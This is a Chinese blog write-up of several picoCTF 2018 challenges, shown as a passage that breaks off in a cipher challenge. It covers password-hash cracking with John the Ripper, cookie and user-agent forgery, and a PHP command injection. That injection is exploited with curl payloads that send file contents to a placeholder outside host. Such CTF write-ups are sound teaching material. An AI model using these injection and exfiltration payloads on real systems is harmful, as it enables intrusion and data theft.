<!DOCTYPE html>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  <title>
    picoCTF wp | 道萝岗特森&#39;s Blog
  </title>
  <meta name="description" content="hello world">
  
  <meta name="keywords" content="
  writeup
  ">
  
  <meta name="author" content="daolgts">

  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="theme-color" content="#1e2327">
  <link rel="apple-touch-icon" href="https://github.githubassets.com/apple-touch-icon.png">
  <link rel="apple-touch-icon" sizes="180x180" href="https://github.githubassets.com/apple-touch-icon-180x180.png">

  <link rel="icon" type="image/x-icon" href="/images/xixi.png">
  <link rel="stylesheet" href="/css/main.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  

  
<script>
  var _hmt = _hmt || [];
  (function(){var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?a868b3c37552464bd253d45da4b33ddf";
    var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();
</script>


  <script src="//cdnjs.cloudflare.com/ajax/libs/vue/1.0.25-csp/vue.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.11.2/moment.min.js"></script>
</head>

<body id="replica-app">

<nav class="navbar-wrapper">
  <div class="navbar">
    <div class="container clearfix">
      <a href="/" class="navbar-logo"><i class="fa fa-github"></i></a>

      <div class="navbar-search float-left desktop-only">
        <div class="navbar-search-form">
          <label for="gsc-i-id1">This website</label>
          <div id="google-search">
            <gcse:search></gcse:search>
          </div>
        </div>
      </div>

      <ul class="navbar-nav float-left">
        
        <li><a href="/archives">Archives</a></li>
        
        <!--  -->
        
        <li><a href="/tags">Tags</a></li>
        
        
          <li><a href="/links">Links</a></li>
        
        
          <li><a href="/about">About</a></li>
        
        
      </ul>

      <ul class="navbar-nav user-nav float-right desktop-only">
        <li class="user-nav-notification">
          <a><span class="user-nav-unread"></span><i class="fa fa-bell"></i></a>
        </li>
        <li>
          <a><i class="fa fa-plus"></i> <i class="fa fa-caret-down"></i></a>
        </li>
        <li class="user-nav-logo">
          <a><img src="/images/avatar.png"> <i class="fa fa-caret-down"></i></i></a>
        </li>
      </ul>
    </div>
  </div>
</nav>

<div class="main-container">
  <header class="header-wrapper desktop-only">
  <div class="container header-site-detail">
    <ul class="header-toolbar">
      <li class="clearfix">
        <a href="/archives" class="header-toolbar-left"><i
                  class="fa fa-file-text"></i> Posts </a>
        <a href="/archives"
           class="header-toolbar-right"> 43 </a>
      </li>
      <li>
        <a href="/tags" class="header-toolbar-left"><i
                  class="fa fa-tags"></i> Tags </a>
        <a href="/tags"
           class="header-toolbar-right"> 23 </a>
      </li>
      <li>
        <a href="/categories" class="header-toolbar-left"><i
                  class="fa fa-folder-open"></i> Categories </a>
        <a href="/categories"
           class="header-toolbar-right"> 0 </a>
      </li>
    </ul>
    <h2 class="header-title">
      <i class="fa fa-book text-muted"></i>
      <a href="/">道萝岗特森&#39;s Blog</a>
      
      
    </h2>
  </div>

  <div class="container">
    <div class="header-tab-wrapper clearfix">
      <span class="header-tab header-tab-selected"><i class="fa fa-thumbs-o-up"></i> Like</span>
      <span class="header-tab"><i class="fa fa-share-alt"></i> Share</span>
      <span class="header-tab"><i class="fa fa-comments-o"></i> Discussion</span>
      <span class="header-tab"><i class="fa fa-bookmark-o"></i> Bookmark </span>
      <span class="header-tab"><i class="fa fa-smile-o"></i> Smile <i class="fa fa-caret-down"></i></span>
    </div>
  </div>
</header>


<div class="post-container container">
  <h3>
    <i class="fa fa-user-o"></i>
    daolgts

    <span class="post-date float-right" title="{{moment(1539587096000).format('MMM DD, YYYY, h:mm:ss A')}}">
      <i class="fa fa-pencil-square-o"></i>
      {{moment(1539587096000).fromNow()}}
    </span>
  </h3>

  <article class="post-content">
    <h1>picoCTF wp</h1>
    <h3 id="HEEEEEEERE’S-Johnny"><a href="#HEEEEEEERE’S-Johnny" class="headerlink" title="HEEEEEEERE’S Johnny!"></a>HEEEEEEERE’S Johnny!</h3><p>给了passwd和shadow文件，就是破解linux用户密码</p>
<p><code>passwd</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure>

<p><code>shaodw</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:::</span><br></pre></td></tr></table></figure>

<p>用kali自带的john工具</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop/HEEEEEEERE&apos;S Johnny!# john --wordlist=/usr/share/wordlists/rockyou.txt  tocrack</span><br><span class="line">Warning: detected hash type &quot;sha512crypt&quot;, but the string is also recognized as &quot;crypt&quot;</span><br><span class="line">Use the &quot;--format=crypt&quot; option to force loading these as that type instead</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])</span><br><span class="line">Press &apos;q&apos; or Ctrl-C to abort, almost any other key for status</span><br><span class="line">thematrix        (root)</span><br><span class="line">1g 0:00:00:18 DONE (2018-10-08 05:24) 0.05488g/s 604.1p/s 604.1c/s 604.1C/s kenya..saavedra</span><br><span class="line">Use the &quot;--show&quot; option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br><span class="line">root@kali:~/Desktop/HEEEEEEERE&apos;S Johnny!# john --show tocrack</span><br><span class="line">root:thematrix:0:0:root:/root:/bin/bash</span><br><span class="line"></span><br><span class="line">1 password hash cracked, 0 left</span><br></pre></td></tr></table></figure>

<h3 id="Aca-Shell-A"><a href="#Aca-Shell-A" class="headerlink" title="Aca-Shell-A"></a>Aca-Shell-A</h3><p>根据他的提示一步一步来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"> ~  nc 2018shell1.picoctf.com 33158</span><br><span class="line">Sweet! We have gotten access into the system but we aren&apos;t root.</span><br><span class="line">It&apos;s some sort of restricted shell! I can&apos;t see what you are typing</span><br><span class="line">but I can see your output. I&apos;ll be here to help you along.</span><br><span class="line">If you need help, type &quot;echo &apos;Help Me!&apos;&quot; and I&apos;ll see what I can do</span><br><span class="line">There is not much time left!</span><br><span class="line">~/$ ls</span><br><span class="line">blackmail</span><br><span class="line">executables</span><br><span class="line">passwords</span><br><span class="line">photos</span><br><span class="line">secret</span><br><span class="line">~/$ cd secret</span><br><span class="line">Now we are cookin&apos;! Take a look around there and tell me what you find!</span><br><span class="line">~/secret$ ls</span><br><span class="line">intel_1</span><br><span class="line">intel_2</span><br><span class="line">intel_3</span><br><span class="line">intel_4</span><br><span class="line">intel_5</span><br><span class="line">profile_AipieG5Ua9aewei5ieSoh7aph</span><br><span class="line">profile_Xei2uu5suwangohceedaifohs</span><br><span class="line">profile_ahShaighaxahMooshuP1johgo</span><br><span class="line">profile_ahqueith5aekongieP4ahzugi</span><br><span class="line">profile_aik4hah9ilie9foru0Phoaph0</span><br><span class="line">profile_bah9Ech9oa4xaicohphahfaiG</span><br><span class="line">profile_ie7sheiP7su2At2ahw6iRikoe</span><br><span class="line">profile_of0Nee4laith8odaeLachoonu</span><br><span class="line">profile_poh9eij4Choophaweiwev6eev</span><br><span class="line">profile_poo3ipohGohThi9Cohverai7e</span><br><span class="line">Sabatoge them! Get rid of all their intel files!</span><br><span class="line">~/secret$ rm intel_*</span><br><span class="line">Nice! Once they are all gone, I think I can drop you a file of an exploit!</span><br><span class="line">Just type &quot;echo &apos;Drop it in!&apos; &quot; and we can give it a whirl!</span><br><span class="line">~/secret$ echo &apos;Drop it in!&apos;</span><br><span class="line">Drop it in!</span><br><span class="line">I placed a file in the executables folder as it looks like the only place we can execute from!</span><br><span class="line">Run the script I wrote to have a little more impact on the system!</span><br><span class="line">~/secret$ cd ..</span><br><span class="line">~/$ cd executables</span><br><span class="line">~/executables$ ls</span><br><span class="line">dontLookHere</span><br><span class="line">~/executables$ ./dontLookHere</span><br><span class="line"> 8c4a 2484 feba 76aa 88a7 54be 7cc7 6119 3f6a dfcc 96b4 1a2c 91bc a4b6 8cf1 6942 c3c8 8707 0612 6834 e5e4 347d 3bbf 930c 1cb3</span><br><span class="line"> 0992 ad0a a631 5a70 dc88 9311 e6e2 596a 230b 34d9 5fd8 73ed 2fdc a9ee 5833 b7d1 49b1 1fc1 09b8 85e7 4d14 dffb 3b3b 08e2 62db</span><br><span class="line"> 96cf 0055 5e5e a90d 0ddf 0a3d 79f6 56d2 7bf0 fb3d 2942 71c4 14a2 2bcd 74d9 c4ca 7f7e f7b6 6688 8cef 9f21 3ad9 d139 cc32 2236</span><br><span class="line"> a3c1 edb5 9d25 576a 46c0 9cdb 9618 a1cd 849d f589 93a5 620a 6d47 e69a 6199 a8ba be23 a532 8e3a 4245 3e34 ac51 98f5 1054 7a95</span><br><span class="line"> 72fe 74fa e233 308a 4157 8e87 6736 15f0 eafe 709a ad3a e181 caf0 d939 4ad2 70c9 96de 07b1 9de5 6a45 0707 f9d9 8f3a 1bb5 e8f4</span><br><span class="line"> 34f9 eb24 bf8e e80f ca71 115c 9d23 94e2 e05f 3cb6 f5d2 86e9 ea66 c5e0 1d23 45b8 d676 e1e0 b589 a3b9 d929 52ba 177c e4ca b027</span><br><span class="line"> 3f07 7247 f5f8 0843 5d6d 46d4 2f5d 3b39 d7fc dc81 36e2 22ee 39b7 949e 94ff 1869 6dea d55e 7e36 afaa 5a96 9ceb ff5d efe5 9b0b</span><br><span class="line"> ad9e 69f0 253b 2874 6eff 27b5 ccbf 1661 2564 f921 1290 725b 49f6 aa7b 4c63 b3e3 9e15 03ab ecd3 9405 d6e5 1bc0 bffd 1633 1382</span><br><span class="line"> 6e7d 9726 8e35 aa9c 3632 525a 2b74 c61f 1237 eda6 06ca 3fb5 dd96 0508 228d dcd7 bc48 1429 2e85 627d 360c 8626 a8b4 3f38 df81</span><br><span class="line"> f320 ca26 c0d8 1f5d 40a1 1a6f 74b4 e366 3995 66f1 4617 4b8b 5a15 a1fc 8ec8 81cf 6f5e 6608 20b4 71d8 eec9 95dc 90fc 8a57 6db5</span><br><span class="line"> c87d 19e7 9af2 4c8f 807e c234 924f 4730 178e 3dc8 a6a7 edb9 9d61 8807 12e5 dfb8 e6fd c59d 5a93 c337 1be2 ccf3 f207 cd27 fd72</span><br><span class="line"> 449f 5926 55f5 c301 6395 1b58 8607 4c69 a487 de55 55c2 7d74 cfb3 b6ef 6af8 1325 6557 c24b d6f1 2278 519a aadd 2653 776a da11</span><br><span class="line"> e31f ccd1 cc95 1b27 2dde 5b9f f843 3923 17c6 e1d2 3676 3f34 f114 d294 1efd cfaf 8fe5 1d30 4fc2 28fd 324e 21ed d674 42ba d569</span><br><span class="line"> 47de 1162 6805 75d5 4173 af3a 463b 08f9 3a75 abdd fe25 3826 718a 275f 5c18 4c81 4b32 3aa6 c93e d9a0 0818 25e3 afed e67e 55d2</span><br><span class="line"> b17c a065 52de 54a4 ee0e 412a 1442 250d 9163 d6d4 5b21 ca0b 1f14 49f7 ecc5 05eb b56a 612f 26d1 3c49 b612 4ad6 4ef6 15c7 836e</span><br><span class="line"> 10b8 5888 017d 32b9 3671 aa24 c08f 9cb9 9611 e71d 8a86 eb43 9ef8 a31c ed09 c5ba 51e0 d0b4 f36f 9ffc f806 143e f6b5 d3ce aed2</span><br><span class="line"> 1af1 0a8e 9391 7fdb 3cf1 aee2 4af2 778c beb1 cfe8 790b d71c 44aa 6233 a8f0 90eb aeeb c0d2 6d7d a2ff 80e6 4196 e48b 8d92 5392</span><br><span class="line"> 4fb5 a3c0 d4d6 34e4 30d2 6a79 bffd cf48 41ef dc34 51f0 8a24 70ea 6406 e9c3 60d3 d7d3 75f3 9df6 56a8 50dc fa2a 60fd d111 eb11</span><br><span class="line"> 4f30 d70b 666b 97ab 7c01 9b4e aace 460e 10c3 8a10 23b3 2d31 16a8 569a 1830 f6f7 114f 56da a935 ba59 2786 a1d1 34a6 cbb0 d5a1</span><br><span class="line"> 92af 3e3b 045e e499 6ca8 9e50 eb23 320e 329c 1cf3 f2e1 0ab7 00c0 396a c7a9 6d7e 86c0 3374 435c 658b fd80 5b6f d843 bde5 1238</span><br><span class="line"> fcdc ffc9 c3b9 c630 8cf1 cd30 d401 3226 58be d5c7 fd83 d659 8565 4590 c6c0 a4c2 bdfe 8772 835a a59e 03d0 d852 f93c effd 4704</span><br><span class="line"> 0210 d63b db1a ae07 6eb2 3938 b944 cbb5 a899 8d4d 6e7d 8cb9 417f d202 fdf5 4ed9 557b a1b1 6d5d af57 c316 9797 571d 19cd b114</span><br><span class="line"> 64ca 5b96 05f3 f673 9051 9933 63cc f86c 7f85 f43c 547d c5ab 8b67 58cc bd1c 3cca e234 f4d4 5ed3 0fba f069 9b3e 18bc bc25 9642</span><br><span class="line"> 7b4a 18a3 ca80 3666 9e71 6964 fbe8 fb40 db7a 2d22 24b5 3bd2 8ff6 039e 4056 afe5 92fc d9da 3ccf 0f65 ddc1 e1d5 0565 a1e9 bcd4</span><br><span class="line"> d928 cf71 7d04 303b 69a9 44ed ec7c 2e06 0975 5d0a a3af ce0f ac8b 210a ebc7 b3d6 313c c00b 0688 afdb f59c 1e27 8942 06c6 b518</span><br><span class="line"> 96ef 0228 f1e0 ad51 481b fc8c 3617 1465 3169 a097 dee6 e821 be68 bc00 73e2 f765 75bb 1d33 b936 1233 80a5 be12 6871 aa81 ff45</span><br><span class="line"> c758 a48b 7e15 b744 ac7c fe9b 4334 ee35 056b f28f 9d15 e0de 4e6a f75b c60a 1de2 172e b8e8 7966 33ff 9f6f 7f55 cf8c 744c 5810</span><br><span class="line"> 5649 2b03 a17a c4f4 6a0a 17c8 c7d7 6d28 cb31 8d80 a221 930a 1adc e1d9 ba81 3d3f bba1 abc3 9692 8493 0627 5787 ad6e ce71 278c</span><br><span class="line"> e458 2d27 8b26 2110 c7e1 23a9 cfc1 08f3 7fc4 f699 6683 7f6a 46ef 2410 f489 0d2f 39ff 66e7 9b2e d774 896f 1923 6381 43ae 7ea5</span><br><span class="line">Looking through the text above, I think I have found the password. I am just having trouble with a username.</span><br><span class="line">Oh drats! They are onto us! We could get kicked out soon!</span><br><span class="line">Quick! Print the username to the screen so we can close are backdoor and log into the account directly!</span><br><span class="line">You have to find another way other than echo!</span><br><span class="line">~/executables$ whoami</span><br><span class="line">l33th4x0r</span><br><span class="line">Perfect! One second!</span><br><span class="line">Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.</span><br><span class="line">Try copying the file called TopSecret in tmp directory into the passwords folder.</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">: command not found or invalid</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ in tmp directory into the passwords folder.</span><br><span class="line">in: command not found or invalid</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ~/passwords</span><br><span class="line">~/executables$ cp /tmp/TopSecret ../passwords</span><br><span class="line">Server shutdown in 10 seconds...</span><br><span class="line">Quick! go read the file before we lose our connection!</span><br><span class="line">~/executables$ cd ..</span><br><span class="line">~/$ cd passwords</span><br><span class="line">~/passwords$ ls</span><br><span class="line">TopSecret</span><br><span class="line">~/passwords$ cat TopSecret</span><br><span class="line">Major General John M. Schofield&apos;s graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.</span><br><span class="line">picoCTF&#123;CrUsHeD_It_9edaa84a&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Client-Side-is-Still-Bad"><a href="#Client-Side-is-Still-Bad" class="headerlink" title="Client Side is Still Bad"></a>Client Side is Still Bad</h3><p>查看页面源码，js里拼接起flag</p>
<h3 id="Logon"><a href="#Logon" class="headerlink" title="Logon"></a>Logon</h3><p>只有admin需要验证密码，而判断是否是admin用的cookie，更改cookie为<code>Cookie: admin=True;</code>得到flag</p>
<h3 id="environ"><a href="#environ" class="headerlink" title="environ"></a>environ</h3><p>linux的环境变量</p>
<p><code>env</code>查看所有环境变量</p>
<p>得到<code>SECRET_FLAG=picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}</code></p>
<p><code>set</code>查看所有本地定义的环境变量</p>
<h3 id="Secret-Agent"><a href="#Secret-Agent" class="headerlink" title="Secret Agent"></a>Secret Agent</h3><p>提示useragent谷歌可以看</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;http://www.google.com/bot.html)</span><br></pre></td></tr></table></figure>

<p><code>Googlebot</code>是谷歌的网页抓取机器人</p>
<h3 id="you-can’t-see-me"><a href="#you-can’t-see-me" class="headerlink" title="you can’t see me"></a>you can’t see me</h3><p>shell登陆后进入<code>/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa</code>目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">daolgts@pico-2018-shell-1:/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa$ ls -al</span><br><span class="line">total 60</span><br><span class="line">drwxr-xr-x   2 root       root        4096 Sep 28 08:29 .</span><br><span class="line">-rw-rw-r--   1 hacksports hacksports    57 Sep 28 08:29 .</span><br><span class="line">drwxr-x--x 576 root       root       53248 Sep 30 03:45 ..</span><br></pre></td></tr></table></figure>

<p><code>ls -al</code>发现有个文件叫<code>.</code>，不能直接cat读</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">daolgts@pico-2018-shell-1:/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa$ cat .*</span><br><span class="line">cat: .: Is a directory</span><br><span class="line">picoCTF&#123;j0hn_c3na_paparapaaaaaaa_paparapaaaaaa_093d6aff&#125;</span><br><span class="line">cat: ..: Permission denied</span><br></pre></td></tr></table></figure>

<h3 id="fancy-alive-monitoring"><a href="#fancy-alive-monitoring" class="headerlink" title="fancy-alive-monitoring"></a>fancy-alive-monitoring</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;title&gt;Monitoring Tool&lt;/title&gt;</span><br><span class="line">	&lt;script&gt;</span><br><span class="line">	function check()&#123;</span><br><span class="line">		ip = document.getElementById(&quot;ip&quot;).value;</span><br><span class="line">		chk = ip.match(/^\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;$/);</span><br><span class="line">		if (!chk) &#123;</span><br><span class="line">			alert(&quot;Wrong IP format.&quot;);</span><br><span class="line">			return false;</span><br><span class="line">		&#125; else &#123;</span><br><span class="line">			document.getElementById(&quot;monitor&quot;).submit();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	&lt;/script&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;h1&gt;Monitoring Tool ver 0.1&lt;/h1&gt;</span><br><span class="line">	&lt;form id=&quot;monitor&quot; action=&quot;index.php&quot; method=&quot;post&quot; onsubmit=&quot;return false;&quot;&gt;</span><br><span class="line">	&lt;p&gt; Input IP address of the target host</span><br><span class="line">	&lt;input id=&quot;ip&quot; name=&quot;ip&quot; type=&quot;text&quot;&gt;</span><br><span class="line">	&lt;/p&gt;</span><br><span class="line">	&lt;input type=&quot;button&quot; value=&quot;Go!&quot; onclick=&quot;check()&quot;&gt;</span><br><span class="line">	&lt;/form&gt;</span><br><span class="line">	&lt;hr&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">$ip = $_POST[&quot;ip&quot;];</span><br><span class="line">if ($ip) &#123;</span><br><span class="line">	// super fancy regex check!</span><br><span class="line">	if (preg_match(&apos;/^(([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5]).)&#123;3&#125;([1-9]?[0-9]|1[0-9]&#123;2&#125;|2[0-4][0-9]|25[0-5])/&apos;,$ip)) &#123;</span><br><span class="line">		exec(&apos;ping -c 1 &apos;.$ip, $cmd_result);</span><br><span class="line">		foreach($cmd_result as $str)&#123;</span><br><span class="line">			if (strpos($str, &apos;100% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is NOT alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br><span class="line">			&#125; else if (strpos($str, &apos;, 0% packet loss&apos;) !== false)&#123;</span><br><span class="line">				printf(&quot;&lt;h3&gt;Target is alive.&lt;/h3&gt;&quot;);</span><br><span class="line">				break;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125; else &#123;</span><br><span class="line">		echo &quot;Wrong IP Format.&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line">&lt;a href=&quot;index.txt&quot;&gt;index.php source code&lt;/a&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>给出了源码，发现在js和php都验证了ip的合法性，但php中验证ip合法性的正则表达式没有以<code>$</code>结束，即没有指定正则表达式的结束，<code>1.1.1.1aaaaa</code>也是能匹配的，所以存在漏洞</p>
<p>执行命令的结果存在<code>$cmd_result</code>，但没有回显</p>
<p>尝试了反弹shell，没有成功，就用了curl将命令执行的结果带出来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ip=1.1.1.1|curl X.X.X.X?a=`ls |head -n 4|tail -n 1`</span><br><span class="line"></span><br><span class="line">ip=1.1.1.1|curl X.X.X.X?a=`cat super-secret-12365-flag.txt |base64`</span><br></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfOTY2MzlkOTF9Cgo=</span><br><span class="line"></span><br><span class="line">解码：</span><br><span class="line"></span><br><span class="line">Here is your flag: picoCTF&#123;n3v3r_trust_a_b0x_96639d91&#125;</span><br></pre></td></tr></table></figure>

<h3 id="hertz"><a href="#hertz" class="headerlink" title="hertz"></a>hertz</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">sokeaufx twaw qx yoza ciue - xzvxfqfzfqok_sqrtwax_uaw_xoihuviw_cekhheknlx</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">xfufwiy, rizlr vzsb lziiqeuk sulw caol ftw xfuqatwun, vwuaqke u vodi oc</span><br><span class="line">iuftwa ok dtqst u lqaaoa ukn u augoa iuy saoxxwn. u ywiiod nawxxqkeeodk,</span><br><span class="line">zkeqaniwn, dux xzxfuqkwn ewkfiy vwtqkn tql ok ftw lqin loakqke uqa. tw</span><br><span class="line">twin ftw vodi uiocf ukn qkfokwn:</span><br><span class="line"></span><br><span class="line">-qkfaoqvo un uifuaw nwq.</span><br><span class="line"></span><br><span class="line">tuifwn, tw rwwawn nodk ftw nuab dqknqke xfuqax ukn suiiwn ozf 